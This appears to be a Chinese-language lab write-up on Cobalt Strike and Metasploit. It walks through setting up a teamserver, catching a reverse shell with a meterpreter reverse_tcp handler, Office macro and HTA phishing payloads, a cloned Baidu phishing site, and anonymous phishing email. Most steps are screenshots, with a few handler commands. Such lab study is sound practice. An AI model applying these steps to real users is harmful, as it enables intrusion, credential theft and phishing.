APT实例

结合metasploit,反弹shell

1、 启动服务端:(test 为待会靶机连接服务器的密码) (./teamserver 192.168.1.100 test)

image.png

2、 客户端连接服务器 运行:cobalstrike.bat

image.png

3、 客户端(添加2个监听器)

image.png

4、 生成木马并在靶机上运行

image.png

image.png

image.png

5、 反弹型,点击木马,靶机上线。

image.png

6、 Msf配置

使用exploit/multi/handler模块(use exploit/multi/handler )

设置payload( set payload windows/meterpreter/reverse_tcp)

设置lhost,lport,运行run -j

image.png

image.png

7、 派生会话 msf监听选choose

image.png

8、 进入会话1(sessions -i 1)执行成功

image.png

9、 进入对方shell

image.png
image.png

实验二、完成office宏钓鱼

1、 生成office码


image.png

2、 重启office 码上线

image.png

3、 重启office 码上线成功

image.png

实验三、完成hta网页挂马

1、 生成hta监听


image.png

2、 创建木马 powershell比较稳定


image.png

image.png

3、 钓鱼攻击→文件下载然后配置

image.png

image.png

4、 evil.hta文件会自动传到cs uploads目录。


image.png

5、 克隆网站


image.png
image.png

6、伪造百度钓鱼网站登录成功(伪造的ip打开是百度假设木马网站)


image.png

实验四、钓鱼邮件

1、cs端攻击→邮件钓鱼

image.png

2、下载邮件模板

image.png

3、模板删除内容:收发信息、日期。生成222.txt加入到第二个选项


image.png

image.png
image.png

4、触发文件


image.png

5、配置邮件客户端,设置stmp。手机发送“配置邮件客户端”


image.png

image.png

image.png

6、 填写好发送

image.png

7、 点击发送,匿名发送成功

image.png

技术小白还在路上,欢迎各路大神批评指正!~

你可能感兴趣的:(APT实例)